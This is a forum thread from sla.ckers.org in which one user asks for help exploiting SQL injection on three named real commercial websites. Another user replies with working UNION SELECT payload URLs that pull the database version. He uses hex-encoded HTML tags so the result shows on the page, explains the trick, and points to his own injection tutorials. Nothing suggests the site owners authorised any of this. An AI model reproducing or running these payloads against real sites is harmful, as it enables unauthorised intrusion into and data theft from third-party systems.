Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
multiple sites..can count column but not see vuln..
Posted by: kenjii
Date: November 25, 2013 09:32AM

hi all i can count the column number but not see what column is vulnerable...


http://www.hearingisbelieving.co.uk/accessories.php?accCat=2%20order%20by%2010


http://www.shoplocalstores.ca/productdetail.php?pid=62&id=45

http://www.cleanic.com.hk/EN/productDetail.php?id=434&series_id=-18%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--


thx for the help

Options: ReplyQuote
Re: multiple sites..can count column but not see vuln..
Posted by: ajkaro
Date: November 28, 2013 12:32PM

hXXp://wXw.hearin[slackers]gisbelieving.co.uk/accessories.php?accCat=2
search web for some MSAccess SQLi tutorial (I hate doing Micro$oft SQL injection)

hXXp://wXw.shoploc[slackers]alstores.ca/productdetail.php?pid=62' and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat('</title>',version()),17,18,19,20,21,22,23,24,25,26,27 -- -&id=45

hXXp://wXw.cle[slackers]anic.com.hk/EN/productDetail.php?id=434&series_id=18 and 0 UNION SELECT 1, concat(0x3c2f6c693e3c2f756c3e, version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -

Options: ReplyQuote
Re: multiple sites..can count column but not see vuln..
Posted by: kenjii
Date: November 29, 2013 01:11PM

wow thank's a lot you answer to all my post :)

for the msaccess it's ok i found

but for the ,concat('</title>',version()) can you explain me more ? first time i see that....

and the same for this one concat(0x3c2f6c693e3c2f756c3e, version())


sorry for my bad english

Options: ReplyQuote
Re: multiple sites..can count column but not see vuln..
Posted by: ajkaro
Date: November 29, 2013 02:37PM

it is html modification done by SQLi so data are not hidden in web page source, but showed in web page...

1)
<title>your SQL injection</title>
to see injection result on web page instead of in title part of web page (see html code of web page)


2)
sam here: I modified some HTML tags to see injection result on web page
</li></ul> is 0x3c2f6c693e3c2f756c3e in HEX

See my tutorial "SQLi - adding HTML commands" in my tutorials collection:
http://www.hackforums.net/showthread.php?tid=3819819
for explanation...

Options: ReplyQuote
Re: multiple sites..can count column but not see vuln..
Posted by: kenjii
Date: December 02, 2013 05:35PM

thank you very much i take a lot of time on reading your tutorial but now i understand

Options: ReplyQuote


Sorry, only registered users may post in this forum.